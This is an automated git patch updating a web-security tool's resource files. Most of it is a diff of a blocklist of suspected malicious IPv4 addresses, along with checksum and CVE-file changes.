From b61e1c0c70532cdcbecc285e33387c66be750822 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <dwisiswant0@users.noreply.github.com>
Date: Thu, 10 Aug 2023 00:06:07 +0000
Subject: [PATCH] db: Update resources [Thu Aug 10 00:06:07 UTC 2023] :robot:

---
 db/MD5SUMS              |    6 +-
 db/bad-ip-addresses.txt | 9926 +++++++++++++++++++--------------------
 db/cves.json            |    2 +-
 db/db.tar.zst           |  Bin 435874 -> 436047 bytes
 4 files changed, 4967 insertions(+), 4967 deletions(-)

diff --git a/db/MD5SUMS b/db/MD5SUMS
index 84cec1b5..f1a5f851 100644
--- a/db/MD5SUMS
+++ b/db/MD5SUMS
@@ -1,7 +1,7 @@
 fec396f8dc853587673931d40c417a2b  bad-crawlers.txt
-01539c0605da3fe27f15185857927fce  bad-ip-addresses.txt
+163783c6585f1448f6ed228f5b0eddf1  bad-ip-addresses.txt
 a1d6e0c632f0d104ce40bbc4cc4ecd86  bad-referrers.txt
 14eef9b9a2c7a248425c4e9b24360eef  common-web-attacks.json
-d9eaf900b16348b7d111f1f024e14ee7  cves.json
-5f1f140fb122684a7cbd693d02918f50  db.tar.zst
+cf60ca94fedc9aa717da76cb4f2283b5  cves.json
+1b7e534dbcbcbf0664adea52872c166e  db.tar.zst
 1f304a7dcc8c417f7b3d027f7ef3c97f  directory-bruteforces.txt
diff --git a/db/bad-ip-addresses.txt b/db/bad-ip-addresses.txt
index 508096b3..80337322 100644
--- a/db/bad-ip-addresses.txt
+++ b/db/bad-ip-addresses.txt
@@ -1,1764 +1,1808 @@
 1.116.243.210
-1.117.22.30
-1.15.248.71
-1.15.79.140
-1.179.128.124
-1.203.115.79
-1.207.250.77
-1.212.197.133
+1.117.192.120
+1.117.87.68
+1.12.60.77
+1.145.107.218
+1.176.185.237
+1.202.82.212
+1.212.197.134
+1.215.40.195
 1.22.54.70
 1.230.102.229
 1.234.2.108
 1.234.2.45
 1.234.2.91
 1.234.23.220
-1.234.44.166
-1.234.47.239
 1.234.80.51
 1.235.198.19
 1.235.198.20
-1.28.87.38
-1.31.80.162
+1.24.223.242
+1.246.219.231
+1.252.63.242
+1.254.140.135
 1.31.87.230
+1.34.135.20
+1.34.69.11
 1.34.70.148
 1.34.81.80
 1.55.155.113
-1.69.20.167
+1.57.23.121
+1.6.52.178
+1.62.154.219
+1.69.100.26
+1.69.111.13
+1.69.112.171
+1.69.57.168
 1.69.99.128
-1.7.180.245
-1.70.100.239
+1.70.101.75
+1.70.11.199
+1.70.126.29
+1.70.127.166
 1.70.127.222
-1.70.130.167
-1.70.135.74
-1.70.14.81
+1.70.13.187
+1.70.138.34
+1.70.139.140
+1.70.161.130
 1.70.165.120
-1.70.8.169
-1.70.8.180
+1.70.165.164
+1.70.83.155
 1.70.84.191
+1.70.9.119
+1.71.249.210
+1.82.135.154
+1.82.191.114
+1.83.154.19
 1.9.78.242
+100.12.206.227
 100.2.160.123
-101.0.96.126
+100.2.41.222
+100.33.46.31
 101.108.97.249
-101.13.0.108
-101.13.0.186
-101.13.0.206
-101.13.0.207
-101.13.0.212
-101.13.0.228
-101.13.0.229
-101.13.0.234
-101.13.0.238
-101.13.0.245
+101.13.0.208
+101.13.0.230
+101.13.0.25
 101.13.0.253
+101.13.0.28
+101.13.0.3
 101.13.0.32
 101.13.0.39
-101.13.0.41
+101.13.0.59
+101.13.0.62
 101.13.0.75
-101.13.0.76
-101.13.0.97
-101.13.1.10
-101.13.1.14
+101.13.1.11
+101.13.1.24
+101.13.1.26
+101.13.1.3
 101.13.1.30
-101.13.1.31
-101.13.1.37
-101.13.1.57
-101.13.1.66
-101.13.1.67
-101.132.97.94
-101.200.166.251
-101.201.119.119
+101.13.1.45
+101.13.1.64
+101.13.1.85
+101.200.58.103
 101.207.113.73
 101.207.232.128
-101.251.197.46
+101.226.198.2
+101.228.51.134
 101.32.103.44
 101.32.31.213
 101.32.46.184
 101.32.74.175
 101.33.123.220
 101.33.80.197
+101.34.32.158
 101.34.47.253
-101.36.102.41
+101.34.51.50
+101.35.54.195
+101.36.105.11
 101.36.107.47
-101.36.108.106
 101.36.118.6
-101.36.153.79
+101.36.151.78
 101.36.161.174
-101.36.174.71
+101.36.172.163
+101.36.177.227
 101.36.177.84
 101.36.179.63
+101.36.181.142
 101.36.97.131
 101.42.25.236
-101.42.250.241
-101.43.110.129
+101.43.146.142
 101.43.54.155
-101.43.56.68
 101.43.78.92
-101.43.93.18
-101.99.74.238
-101.99.90.175
+101.44.2.137
+101.69.242.122
+101.83.32.96
+101.95.97.158
 102.128.78.38
+102.128.78.42
 102.128.78.77
-102.129.37.140
-102.134.147.243
-102.218.10.142
+102.214.16.209
+102.218.10.141
 102.219.212.87
-102.219.33.34
-102.219.86.14
-102.22.146.178
+102.220.158.10
+102.220.204.29
 102.220.22.170
+102.220.22.196
 102.220.22.246
-102.220.22.34
-102.221.249.143
-102.221.249.91
+102.220.23.35
+102.220.23.51
 102.222.160.111
 102.223.173.17
 102.223.180.124
-102.223.73.1
 102.223.92.101
 102.36.230.165
+102.37.155.123
 102.50.247.101
-102.90.34.90
 103.10.171.14
-103.100.9.29
+103.10.231.109
+103.100.217.50
 103.101.161.45
 103.101.83.5
 103.103.100.60
+103.103.30.125
 103.105.200.194
+103.105.225.43
+103.106.104.19
 103.106.104.9
+103.106.154.15
 103.107.36.18
+103.107.99.31
+103.108.156.66
 103.108.60.16
 103.110.84.163
-103.113.29.89
 103.113.36.4
+103.113.83.168
 103.114.107.36
-103.114.144.203
-103.115.131.115
+103.114.146.178
+103.115.152.250
 103.115.24.11
-103.116.52.74
 103.117.141.63
-103.118.168.67
 103.119.3.77
-103.12.163.2
-103.121.165.10
-103.121.197.83
-103.122.162.124
+103.12.161.205
 103.122.162.222
 103.122.162.68
-103.122.21.253
-103.123.1.108
-103.123.1.110
-103.123.1.111
-103.123.1.117
-103.123.1.152
-103.123.1.153
-103.123.1.17
 103.123.63.116
-103.124.136.5
-103.124.188.186
+103.124.93.2
 103.125.161.93
-103.125.253.241
 103.126.172.6
-103.127.30.241
 103.127.53.122
+103.129.108.14
 103.129.220.243
-103.13.206.121
 103.13.207.165
 103.130.198.219
-103.130.214.232
 103.130.218.31
-103.130.219.13
-103.130.219.147
 103.131.104.66
-103.131.189.152
-103.131.189.4
-103.131.189.71
 103.132.98.173
-103.133.57.242
+103.133.127.138
 103.135.117.82
-103.135.34.178
+103.135.168.86
 103.135.88.206
-103.137.75.74
+103.136.82.222
+103.137.89.38
 103.138.173.113
-103.139.192.146
 103.139.192.182
-103.139.43.227
-103.14.225.184
 103.14.26.208
 103.140.234.177
 103.141.111.253
-103.141.208.61
 103.141.64.94
 103.142.139.230
-103.142.87.92
 103.143.171.228
-103.143.230.237
-103.143.248.101
 103.143.248.52
 103.143.248.87
 103.143.248.95
-103.144.148.233
+103.144.177.144
 103.144.243.112
 103.144.28.193
-103.144.28.202
 103.144.3.111
+103.144.87.192
 103.145.181.242
+103.145.27.1
 103.145.85.41
-103.146.0.135
+103.146.141.221
 103.146.158.176
 103.146.158.191
-103.146.202.151
-103.146.233.213
+103.146.234.60
 103.146.50.194
-103.147.186.75
+103.146.50.91
+103.146.53.131
 103.147.242.68
 103.147.242.96
 103.147.248.12
-103.147.248.44
-103.148.113.55
+103.147.248.61
 103.148.201.174
-103.148.202.145
-103.148.202.15
+103.148.202.6
 103.149.27.51
 103.149.28.105
-103.149.9.16
-103.150.191.218
-103.152.145.14
-103.152.164.103
-103.153.136.74
-103.153.254.110
-103.153.78.59
-103.155.74.13
-103.157.115.106
+103.149.74.230
+103.149.74.231
+103.151.194.210
+103.153.214.253
+103.155.77.94
+103.155.86.96
+103.157.114.74
+103.157.115.2
+103.158.57.10
+103.159.132.143
 103.159.156.227
-103.159.21.114
+103.161.150.80
 103.161.150.82
-103.161.17.229
+103.161.150.83
+103.161.232.197
 103.162.15.39
 103.162.20.106
 103.162.20.168
 103.162.29.14
-103.162.41.18
+103.163.215.12
 103.164.221.210
-103.164.98.138
+103.164.26.38
 103.165.130.61
-103.165.156.195
+103.165.156.194
 103.165.78.179
-103.165.93.246
 103.166.150.138
-103.166.210.26
-103.170.191.23
+103.166.156.80
+103.17.48.8
 103.170.204.115
-103.170.246.85
-103.171.115.132
-103.171.157.58
-103.171.162.91
+103.170.221.246
+103.171.168.210
+103.171.84.43
+103.171.84.7
 103.171.86.18
 103.171.91.192
+103.172.205.156
 103.172.94.224
-103.173.137.105
-103.173.154.252
-103.174.164.188
+103.173.78.11
 103.175.142.107
 103.175.172.179
-103.176.78.125
-103.176.78.202
-103.176.79.0
+103.175.189.171
+103.175.189.172
+103.175.8.200
+103.176.78.193
 103.176.79.163
 103.176.96.66
 103.176.96.68
-103.176.96.75
-103.177.212.2
-103.178.229.198
+103.176.96.74
 103.178.77.119
 103.179.148.18
-103.179.198.14
+103.179.242.89
 103.179.57.14
 103.179.57.150
 103.179.57.5
 103.179.57.51
+103.181.14.250
 103.181.142.170
-103.181.158.67
+103.181.142.68
+103.181.212.142
+103.181.212.168
+103.182.10.47
 103.183.47.4
-103.185.243.3
 103.186.0.207
 103.186.18.10
-103.186.185.205
 103.186.240.167
-103.186.28.56
 103.186.99.250
-103.187.147.100
-103.187.191.184
-103.187.191.208
+103.187.147.35
+103.187.191.248
 103.187.78.74
-103.187.83.129
 103.188.164.219
-103.189.131.74
 103.189.234.25
-103.189.86.13
-103.191.178.123
-103.195.236.140
+103.191.76.155
+103.196.165.110
+103.198.26.21
+103.198.26.73
+103.198.26.80
 103.199.215.23
 103.2.233.237
+103.20.34.160
 103.203.224.181
 103.203.57.13
 103.203.57.15
-103.203.57.23
+103.203.57.16
+103.203.57.17
+103.203.57.21
+103.203.57.22
 103.203.57.28
 103.203.57.4
+103.203.57.6
 103.203.58.0
 103.203.58.1
-103.203.59.10
-103.203.59.12
 103.203.59.14
 103.203.59.16
-103.203.59.2
-103.203.59.6
+103.203.59.4
+103.203.59.8
+103.204.119.133
 103.205.113.243
-103.205.133.81
-103.206.105.197
 103.206.72.2
 103.207.8.96
-103.209.252.10
-103.210.133.15
-103.212.211.151
-103.214.11.80
-103.214.112.138
+103.209.140.118
+103.210.21.179
 103.214.175.211
 103.215.222.84
-103.215.223.26
 103.215.83.131
 103.217.78.2
-103.218.243.201
-103.221.221.135
 103.221.252.46
-103.224.152.30
+103.224.215.102
+103.224.32.215
 103.224.36.226
-103.226.248.146
+103.225.13.56
+103.226.138.171
+103.226.248.168
 103.229.84.98
 103.23.198.10
-103.231.202.90
-103.231.248.56
 103.233.2.182
-103.235.106.123
-103.235.34.82
+103.233.206.154
 103.237.144.132
 103.237.144.204
 103.237.146.15
 103.237.54.140
 103.238.71.108
-103.238.71.112
-103.239.171.56
+103.239.67.178
+103.239.67.198
+103.240.110.130
 103.241.225.17
 103.242.199.146
 103.245.109.37
-103.248.41.172
+103.248.32.54
 103.248.60.70
-103.250.10.88
-103.250.11.146
+103.249.77.2
 103.250.11.181
-103.250.159.26
+103.250.11.82
+103.250.52.250
+103.251.143.14
 103.251.167.20
+103.251.52.55
 103.252.117.45
-103.254.71.45
+103.252.119.76
+103.253.43.6
+103.254.132.114
 103.26.136.173
-103.3.120.53
+103.26.137.52
+103.26.51.88
+103.28.52.210
 103.31.38.183
 103.35.65.109
 103.36.100.239
-103.37.80.90
-103.4.145.50
-103.4.231.226
+103.37.60.9
+103.37.83.26
+103.38.4.238
 103.40.101.148
-103.42.124.113
+103.40.123.18
+103.44.13.14
 103.45.246.23
 103.45.246.42
 103.45.65.71
-103.47.174.165
-103.48.116.43
-103.48.192.48
-103.48.193.7
-103.5.104.119
+103.47.184.2
 103.5.133.82
-103.52.114.20
 103.55.75.8
-103.56.149.67
+103.56.61.130
 103.56.61.132
 103.56.61.139
 103.56.61.144
 103.59.196.14
-103.59.38.201
-103.63.108.25
+103.61.73.158
+103.65.197.142
 103.65.227.252
 103.66.50.94
-103.68.52.210
 103.69.217.206
-103.69.238.10
-103.7.40.39
+103.69.217.238
 103.70.190.142
 103.72.147.158
-103.72.3.52
-103.73.164.190
-103.74.70.13
+103.73.188.133
 103.74.72.221
-103.76.139.254
-103.76.205.104
-103.76.208.146
-103.77.172.96
+103.75.199.210
 103.77.173.141
-103.78.88.51
+103.78.143.130
+103.78.205.84
+103.79.90.72
+103.80.197.28
+103.80.27.106
+103.81.189.67
+103.81.86.208
+103.82.145.161
 103.82.145.99
-103.82.22.225
+103.82.240.194
 103.82.241.69
-103.82.82.193
 103.83.80.82
-103.84.130.186
-103.84.250.67
+103.84.236.242
 103.85.160.7
-103.86.146.91
-103.86.49.28
 103.86.50.193
-103.87.130.161
-103.9.159.153
+103.90.203.131
+103.91.103.51
+103.91.136.18
 103.91.182.93
 103.92.24.242
-103.93.237.50
+103.92.39.187
+103.92.39.244
+103.93.201.18
 103.96.148.217
 103.96.150.19
 103.96.151.81
+103.97.166.58
+103.97.245.93
+103.97.247.139
 103.98.4.2
-103.99.10.254
 103.99.149.26
-103.99.36.22
-104.131.1.32
+104.129.130.234
 104.131.12.184
-104.131.128.22
 104.131.128.37
+104.131.129.113
+104.131.13.185
+104.131.14.215
 104.131.144.12
-104.131.144.23
-104.131.144.25
+104.131.144.26
 104.131.144.28
-104.131.144.40
+104.131.144.30
 104.131.144.42
-104.131.180.54
 104.131.190.193
-104.131.3.1
+104.131.39.193
 104.131.40.97
-104.131.64.92
-104.131.68.23
+104.131.55.236
 104.131.69.237
 104.131.8.206
-104.131.85.173
+104.131.91.148
+104.136.151.100
 104.140.14.4
-104.156.155.20
-104.156.155.30
-104.156.155.33
+104.152.52.206
+104.156.155.14
+104.156.155.3
 104.168.68.119
 104.168.77.217
 104.168.87.98
 104.168.96.242
-104.175.17.241
 104.175.239.228
-104.183.11.123
 104.186.204.146
-104.192.1.138
-104.193.255.123
-104.194.250.202
-104.197.209.149
+104.192.0.18
 104.198.240.165
 104.199.31.214
 104.199.35.3
 104.199.76.31
-104.214.70.49
-104.218.165.30
-104.219.234.42
+104.218.164.140
+104.218.164.191
+104.218.165.102
+104.219.232.122
 104.223.153.7
 104.224.177.195
-104.225.145.67
-104.225.158.183
 104.225.159.240
 104.236.111.25
-104.236.128.13
 104.236.128.22
-104.236.128.9
-104.236.182.223
+104.236.128.26
+104.236.128.30
+104.236.128.46
 104.236.193.132
-104.236.2.45
 104.236.200.116
 104.236.237.117
 104.236.246.102
 104.236.38.145
-104.237.156.209
 104.237.252.98
+104.244.72.115
 104.244.72.187
 104.244.77.2
 104.244.78.79
 104.248.128.156
-104.248.129.104
 104.248.129.38
+104.248.130.34
 104.248.131.9
+104.248.133.15
 104.248.136.93
-104.248.141.116
-104.248.143.84
+104.248.141.166
 104.248.146.84
+104.248.150.150
 104.248.153.128
 104.248.159.207
-104.248.171.228
 104.248.172.34
+104.248.174.190
+104.248.176.85
+104.248.194.172
 104.248.196.36
 104.248.197.238
-104.248.229.49
+104.248.203.191
 104.248.232.207
 104.248.253.245
-104.248.31.56
 104.248.37.11
 104.248.38.71
 104.248.46.211
 104.248.50.109
 104.248.51.246
 104.248.55.154
-104.248.87.181
-104.248.90.102
 104.248.92.191
 104.249.156.202
 104.249.156.250
-104.48.214.10
+104.254.245.173
+104.45.17.110
 104.48.36.213
-105.112.249.195
-105.22.37.86
-105.73.197.117
-105.96.53.70
-106.105.164.57
-106.110.192.3
-106.111.102.164
-106.116.204.43
-106.117.8.13
+104.59.121.228
+104.62.163.6
+104.63.194.47
+105.174.43.102
+105.242.133.7
+106.1.189.152
+106.107.173.49
+106.110.193.218
+106.110.195.195
+106.112.194.160
+106.117.19.53
+106.117.6.43
 106.12.109.212
 106.12.167.159
+106.12.48.161
 106.120.246.2
 106.13.16.33
-106.14.147.117
+106.14.107.122
+106.14.151.105
 106.146.233.215
 106.15.253.5
-106.15.38.206
-106.201.232.177
-106.241.198.138
+106.201.233.139
+106.225.193.157
 106.241.54.211
 106.246.224.154
-106.246.89.68
-106.252.20.88
+106.246.89.71
 106.37.72.43
-106.38.105.12
-106.41.140.77
+106.38.45.210
+106.39.231.119
+106.41.28.99
 106.41.45.170
-106.41.71.199
-106.51.1.227
-106.51.126.174
+106.41.75.3
+106.51.104.140
+106.51.128.170
+106.51.152.34
 106.51.174.68
-106.51.62.149
+106.51.2.11
 106.51.71.157
 106.51.85.232
-106.75.128.152
+106.52.172.16
+106.52.231.213
+106.73.172.64
 106.75.132.98
 106.75.136.216
-106.75.148.170
+106.75.147.108
 106.75.148.71
-106.75.166.159
-106.75.167.127
-106.75.169.139
+106.75.152.212
+106.75.152.39
+106.75.164.14
+106.75.165.198
 106.75.17.82
-106.75.174.6
-106.75.34.68
-106.75.72.126
-106.75.73.178
-106.75.74.133
-106.75.75.223
-107.0.200.227
-107.148.198.132
-107.150.103.62
-107.150.105.183
-107.150.105.209
-107.150.105.217
-107.150.117.103
-107.150.117.107
-107.150.123.227
-107.150.99.175
+106.75.176.99
+106.75.233.124
+106.75.41.146
+106.91.215.100
+107.150.102.211
+107.150.103.49
+107.150.104.174
+107.150.105.239
+107.150.121.179
+107.150.127.138
+107.155.50.176
+107.155.55.166
+107.155.56.171
 107.155.60.8
-107.170.118.81
-107.170.192.15
-107.170.192.20
-107.170.192.22
-107.170.192.29
 107.170.192.33
-107.170.192.5
-107.170.20.247
-107.170.208.31
-107.170.225.14
-107.170.225.17
-107.170.225.19
+107.170.20.63
+107.170.208.18
+107.170.208.38
+107.170.224.11
+107.170.224.30
+107.170.224.38
 107.170.225.22
-107.170.226.22
-107.170.227.14
-107.170.227.19
+107.170.225.23
+107.170.226.21
+107.170.226.36
+107.170.227.12
 107.170.227.25
-107.170.228.20
+107.170.227.26
+107.170.228.18
 107.170.228.43
+107.170.228.46
+107.170.228.53
 107.170.229.48
+107.170.229.49
 107.170.229.63
-107.170.230.21
 107.170.230.26
-107.170.230.33
-107.170.231.23
-107.170.231.5
-107.170.232.15
-107.170.233.13
+107.170.231.41
+107.170.232.56
+107.170.232.58
+107.170.233.41
+107.170.233.42
+107.170.234.13
 107.170.234.15
-107.170.234.17
-107.170.235.19
+107.170.234.30
+107.170.234.42
+107.170.234.43
+107.170.235.17
 107.170.235.37
-107.170.236.28
-107.170.236.31
-107.170.236.32
+107.170.236.10
+107.170.236.19
 107.170.236.41
 107.170.237.17
-107.170.238.10
-107.170.238.14
-107.170.238.40
-107.170.239.16
+107.170.237.50
+107.170.237.54
+107.170.237.73
+107.170.238.38
+107.170.238.43
+107.170.238.48
 107.170.239.33
+107.170.239.34
+107.170.239.40
 107.170.239.48
-107.170.239.49
-107.170.240.23
-107.170.240.35
-107.170.241.11
+107.170.240.42
+107.170.240.46
+107.170.241.18
 107.170.241.20
-107.170.241.22
-107.170.243.21
-107.170.244.13
+107.170.241.46
+107.170.242.11
+107.170.243.28
+107.170.243.29
+107.170.243.44
 107.170.244.31
+107.170.244.32
 107.170.245.10
-107.170.245.26
-107.170.245.37
+107.170.245.9
 107.170.246.19
-107.170.246.21
-107.170.247.16
+107.170.246.44
+107.170.247.13
+107.170.247.37
+107.170.247.39
+107.170.248.34
+107.170.248.42
 107.170.248.6
-107.170.249.12
 107.170.249.14
-107.170.251.23
+107.170.250.11
+107.170.250.36
+107.170.251.41
+107.170.251.7
+107.170.252.18
+107.170.252.41
 107.170.252.44
-107.170.252.45
-107.170.252.56
-107.170.252.58
-107.170.252.61
-107.170.253.35
-107.170.253.38
+107.170.252.49
+107.170.252.55
+107.170.253.14
+107.170.253.28
+107.170.253.7
 107.170.253.8
+107.170.254.23
 107.170.254.27
-107.170.255.24
+107.170.254.30
 107.170.255.30
-107.170.255.35
-107.170.255.7
-107.170.39.69
-107.170.76.103
+107.170.52.175
+107.172.140.147
+107.172.143.146
 107.172.180.47
-107.172.201.220
 107.172.79.248
-107.172.80.130
 107.172.99.124
 107.173.122.150
 107.173.144.254
-107.173.159.131
+107.173.156.220
+107.173.157.241
 107.173.165.18
-107.173.84.163
-107.173.84.228
-107.174.192.43
+107.173.82.241
+107.174.180.104
+107.174.230.3
+107.174.252.242
 107.174.69.127
 107.175.44.163
+107.175.79.85
 107.179.43.178
-107.180.88.176
-107.182.128.213
-107.182.128.219
-107.182.16.2
-107.182.236.107
+107.181.162.144
 107.182.26.176
+107.185.233.61
 107.189.1.231
 107.189.12.65
+107.189.3.11
+107.189.30.69
 107.189.4.181
 107.189.5.203
 107.189.8.24
 107.196.176.41
 107.217.126.41
 107.6.112.252
-108.14.29.114
+107.91.190.44
+108.137.14.167
 108.166.217.141
-108.167.178.116
+108.17.148.182
 108.171.92.54
-108.174.106.248
 108.174.57.176
 108.178.138.237
 108.184.77.27
-108.223.229.130
-108.235.171.220
+108.185.229.135
 108.41.10.210
 108.54.121.142
-108.58.247.158
-108.60.166.206
+108.60.201.92
 108.81.41.6
 108.87.157.123
-109.103.24.40
-109.107.84.40
+109.1.91.52
+109.121.216.41
 109.122.221.11
-109.123.250.105
+109.123.234.233
+109.123.244.166
 109.125.137.170
 109.130.122.122
 109.132.238.5
 109.167.197.20
-109.173.122.75
-109.174.10.11
+109.167.200.10
 109.194.111.98
 109.195.148.73
+109.195.22.28
+109.195.242.57
 109.205.181.21
-109.205.183.109
 109.205.183.172
+109.205.213.12
 109.205.213.34
 109.205.214.188
-109.206.242.152
 109.206.243.228
-109.207.200.43
-109.207.200.47
-109.237.26.92
+109.226.29.230
+109.235.7.212
+109.237.96.179
 109.237.96.50
-109.237.97.180
+109.237.98.134
 109.237.98.153
 109.237.98.157
 109.237.98.185
 109.237.98.226
-109.245.208.154
+109.238.232.229
 109.247.6.153
 109.248.212.17
 109.248.6.78
-109.70.100.65
-109.70.100.67
-109.70.100.68
+109.61.64.9
+109.70.100.4
+109.72.170.205
+109.74.204.123
+109.75.46.121
+109.92.237.234
+109.98.208.42
 110.11.234.8
-110.136.216.109
 110.141.212.12
-110.164.147.94
+110.142.19.12
+110.164.65.119
 110.166.216.162
-110.17.162.54
 110.170.38.34
-110.172.141.155
-110.177.100.214
-110.177.146.50
-110.177.80.129
 110.177.96.74
 110.178.40.102
-110.178.41.168
-110.178.43.68
-110.178.46.3
-110.179.121.86
+110.178.74.28
+110.180.138.61
 110.180.147.253
-110.180.151.169
-110.180.154.17
-110.180.177.234
-110.181.107.151
+110.180.155.8
+110.180.160.198
+110.181.106.146
 110.181.110.110
-110.181.114.103
+110.181.117.83
 110.181.119.252
-110.181.77.153
+110.181.234.26
+110.181.236.132
 110.182.164.2
-110.182.188.28
-110.182.227.97
-110.182.243.151
+110.182.166.144
+110.182.171.83
+110.182.184.162
+110.182.224.47
+110.182.225.147
+110.182.226.151
+110.182.242.252
+110.182.245.213
 110.182.248.174
 110.182.248.88
-110.182.251.8
-110.182.96.233
-110.183.152.76
+110.182.249.125
+110.182.251.9
+110.182.97.94
 110.183.154.93
 110.183.20.72
-110.183.21.17
-110.183.24.107
-110.183.52.237
+110.183.21.103
+110.183.22.175
 110.183.52.55
-110.183.54.42
-110.226.176.241
+110.183.54.194
+110.183.59.166
+110.226.179.93
 110.227.198.68
-110.227.202.226
 110.227.203.10
+110.227.250.173
+110.227.251.79
+110.227.252.108
 110.235.243.121
-110.238.68.180
-110.249.135.116
 110.25.88.160
 110.25.99.25
-110.25.99.26
-110.25.99.27
 110.25.99.35
-110.25.99.37
-110.25.99.39
-110.35.173.103
-110.36.227.150
-110.39.181.194
+110.25.99.92
+110.39.81.117
 110.40.151.212
 110.45.145.194
 110.45.146.223
+110.49.167.250
+110.49.76.244
+110.50.48.253
 110.80.19.243
-111.113.8.70
-111.118.140.250
-111.120.9.83
-111.121.217.93
-111.14.217.114
-111.160.101.82
-111.160.116.170
+110.90.14.14
+111.12.63.34
+111.120.1.198
+111.16.208.89
 111.160.208.34
 111.161.125.133
 111.161.41.156
-111.161.65.146
-111.163.188.141
+111.17.205.38
 111.173.104.132
-111.2.113.75
-111.207.192.117
-111.21.45.74
+111.180.193.53
+111.207.231.65
 111.217.204.48
-111.23.117.117
+111.229.252.89
+111.23.117.108
+111.23.117.219
+111.23.174.204
 111.23.182.154
-111.230.62.32
-111.238.174.6
-111.28.128.154
-111.33.86.22
-111.33.89.90
+111.33.42.198
+111.33.43.86
+111.39.212.68
 111.39.46.47
+111.40.121.69
+111.44.138.135
 111.44.158.197
-111.53.4.174
+111.53.57.77
+111.53.71.96
 111.53.87.28
-111.56.31.203
+111.56.176.138
+111.56.185.238
+111.57.0.90
 111.6.96.232
+111.61.107.27
 111.61.211.217
-111.61.93.20
-111.62.142.14
-111.67.192.132
-111.67.194.160
-111.67.196.206
+111.61.214.106
+111.62.142.17
+111.63.22.72
+111.63.40.221
 111.67.197.42
-111.67.199.217
+111.67.197.52
+111.67.198.231
 111.67.201.141
+111.68.108.73
 111.68.98.152
-111.70.12.114
+111.70.1.239
 111.70.12.64
-111.70.13.116
+111.70.12.84
+111.70.14.20
+111.70.16.230
 111.70.16.232
-111.70.16.65
-111.70.19.104
+111.70.17.55
+111.70.18.165
+111.70.18.211
 111.70.19.149
-111.70.20.39
-111.70.20.90
+111.70.19.159
+111.70.19.21
+111.70.19.4
+111.70.2.127
+111.70.2.66
+111.70.20.54
+111.70.25.161
 111.70.25.57
-111.70.26.117
+111.70.26.51
 111.70.27.106
-111.70.28.141
-111.70.28.145
+111.70.28.148
 111.70.28.217
-111.70.28.39
+111.70.28.49
+111.70.28.51
+111.70.28.55
 111.70.28.64
-111.70.28.92
-111.70.37.122
-111.70.37.162
-111.70.37.93
-111.70.5.77
-111.70.7.112
-111.70.7.139
-111.70.9.198
-111.75.223.17
-111.90.150.28
+111.70.29.143
+111.70.29.157
+111.70.3.176
+111.70.37.160
+111.70.37.59
+111.70.5.146
+111.74.8.14
+111.90.173.220
+111.92.109.248
 111.93.200.50
 111.95.141.34
-112.104.52.138
-112.11.221.136
+112.102.48.193
 112.111.183.19
-112.132.249.164
+112.113.124.67
 112.133.204.98
 112.133.225.72
-112.15.117.200
-112.157.108.141
-112.16.185.112
-112.160.255.234
+112.133.238.235
+112.137.132.89
+112.137.140.40
+112.14.132.197
 112.161.116.4
 112.161.214.48
+112.162.161.163
 112.163.214.174
 112.163.242.208
 112.164.158.57
 112.164.55.185
-112.165.212.156
+112.165.39.125
 112.165.44.229
-112.167.180.10
+112.166.10.205
+112.167.233.14
 112.167.247.43
-112.168.168.36
+112.167.4.168
 112.168.27.14
-112.170.115.251
-112.170.198.189
+112.169.120.117
+112.17.101.33
 112.171.50.213
 112.172.191.54
-112.173.174.97
-112.173.42.188
+112.173.125.118
+112.173.90.204
 112.184.144.231
 112.184.182.2
-112.185.10.38
-112.185.201.226
-112.186.198.235
+112.185.246.51
+112.185.26.212
+112.187.12.214
+112.194.142.147
+112.196.62.36
 112.196.76.140
-112.197.113.76
 112.199.211.170
 112.199.95.199
-112.213.120.30
+112.2.5.121
+112.213.120.23
 112.213.120.6
+112.213.120.81
 112.216.108.62
-112.216.96.154
+112.216.178.154
+112.217.207.26
+112.217.225.59
+112.220.238.3
 112.221.4.3
-112.237.26.27
-112.246.50.152
-112.251.1.101
+112.239.142.22
+112.245.55.60
+112.26.177.148
+112.26.240.59
+112.26.246.205
+112.26.74.117
 112.26.89.149
-112.27.148.14
-112.27.155.194
-112.28.209.251
+112.27.121.90
 112.28.209.66
 112.28.9.167
-112.30.65.87
+112.30.1.17
+112.30.211.165
 112.31.107.31
+112.31.93.182
+112.31.93.229
+112.31.93.6
+112.5.10.207
 112.5.3.230
-112.51.3.63
-112.54.41.84
-112.6.211.131
+112.6.114.199
 112.64.32.118
-112.72.130.9
+112.64.33.38
+112.78.177.219
 112.91.185.162
-112.94.5.43
+112.98.110.210
 113.0.67.250
-113.108.131.2
-113.128.13.18
-113.128.229.114
-113.131.245.30
-113.141.90.197
-113.16.195.187
-113.160.171.63
-113.161.239.142
-113.161.46.47
-113.195.172.6
+113.108.88.121
+113.109.133.110
+113.140.1.50
+113.160.244.144
+113.195.160.147
+113.195.172.95
 113.195.172.96
-113.204.147.26
+113.195.172.98
+113.200.214.20
+113.200.98.17
 113.21.232.39
-113.219.213.168
-113.221.77.95
-113.239.157.158
-113.239.158.203
-113.24.128.158
-113.24.128.242
-113.24.167.240
-113.24.191.60
+113.215.42.136
+113.221.78.43
+113.221.79.218
+113.229.81.104
+113.234.195.199
+113.239.154.128
+113.24.144.106
+113.24.146.109
+113.24.164.51
+113.25.200.60
+113.25.207.155
+113.25.211.58
+113.255.148.30
+113.26.121.80
 113.26.122.67
-113.26.196.125
+113.26.154.224
+113.26.191.217
 113.26.199.213
-113.26.228.109
+113.26.235.76
+113.26.56.168
 113.26.81.113
-113.26.89.115
-113.27.33.219
-113.27.36.217
+113.26.85.167
+113.27.32.223
+113.27.34.156
 113.30.150.23
-113.52.149.243
+113.30.150.83
+113.31.162.174
 113.53.253.55
-113.57.92.188
+113.57.110.56
+113.57.152.156
+113.59.187.167
+113.62.119.50
 113.62.160.110
-114.104.204.9
+114.105.103.186
+114.108.181.139
 114.113.234.44
-114.129.28.238
-114.132.234.174
-114.132.250.235
-114.139.211.25
-114.139.211.3
-114.141.53.82
-114.165.9.187
+114.115.212.180
+114.174.37.184
+114.199.123.211
 114.205.54.184
 114.206.23.151
-114.207.113.200
-114.216.213.67
+114.214.164.36
+114.216.207.9
 114.216.24.24
+114.216.25.145
+114.217.12.155
 114.217.123.212
-114.217.145.208
-114.217.173.49
+114.218.117.196
 114.218.214.46
+114.218.9.137
+114.219.119.137
 114.219.241.174
-114.220.164.179
-114.220.78.164
+114.220.131.197
 114.221.213.218
-114.226.108.68
+114.226.103.151
+114.226.135.184
 114.226.192.100
 114.226.192.157
+114.226.192.28
 114.226.192.74
-114.226.210.221
-114.226.36.48
